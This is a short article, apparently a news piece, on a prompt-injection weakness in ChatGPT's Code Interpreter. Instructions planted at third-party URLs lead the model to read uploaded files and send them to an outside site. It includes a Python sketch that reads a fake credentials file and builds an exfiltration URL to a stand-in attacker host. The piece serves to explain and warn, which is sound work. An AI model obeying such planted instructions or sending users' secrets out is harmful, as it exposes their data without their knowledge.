Security Risks of OpenAI's ChatGPT Code Interpreter Tool
OpenAI's new ChatGPT Code Interpreter, which can generate and run Python code in a sandbox, has been shown to allow malicious actors to exploit spreadsheet handling and command execution features, raising serious information‑security concerns among experts.
OpenAI recently launched a new Code Interpreter tool for ChatGPT, which can help programmers debug and improve code.
The tool uses AI to write Python code and can even execute it in a sandboxed environment.
However, according to cybersecurity expert Johann Rehberger and reports from Tom's Hardware and other outlets, because the interpreter can process any uploaded spreadsheet file and present its data as charts, attackers can trick ChatGPT into executing instructions planted at third‑party URLs.
Currently only ChatGPT Plus subscribers can access the tool, but the vulnerability has raised concerns among security experts.
Tom's Hardware reproduced the issue by creating a fake environment‑variable file, uploading it to ChatGPT, and prompting the model to send its contents to an external malicious site.
ChatGPT can also respond to Linux commands and access files within its sandbox, allowing attackers to retrieve sensitive data without the user's knowledge.
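To make the risk concrete, here is a minimal sketch of the pattern the reproduction describes: a fake environment‑variable file with dummy values, and the kind of trivial Python a prompt‑injected Code Interpreter session could run in its sandbox to read that file and embed its contents in an attacker‑controlled URL. The file name, the dummy credentials, and the URL are hypothetical placeholders, not details taken from the report, and the sketch only prints the resulting URL rather than requesting it.

```python
# Minimal sketch of the exfiltration pattern described above.
# All file names, values, and URLs here are hypothetical placeholders.
from pathlib import Path
from urllib.parse import quote

# 1. A fake environment-variable file with dummy credentials,
#    standing in for the file Tom's Hardware uploaded to the sandbox.
env_file = Path("fake.env")
env_file.write_text("API_KEY=dummy-1234\nDB_PASSWORD=not-a-real-secret\n")

# 2. Code the model could be tricked into running: read the file
#    and embed its contents in a URL pointing at a third-party site.
secrets = env_file.read_text()
exfil_url = "https://attacker.example/collect?data=" + quote(secrets)

# 3. In the reported attack, the sandbox would then request this URL,
#    silently handing the data to whoever controls that server.
#    Here we only print it to show what would be leaked.
print(exfil_url)
```

The takeaway for users is the same one the researchers draw: anything uploaded to the Code Interpreter sandbox, including files that merely look like configuration data, should be treated as potentially exposed if the session also processes untrusted third‑party content.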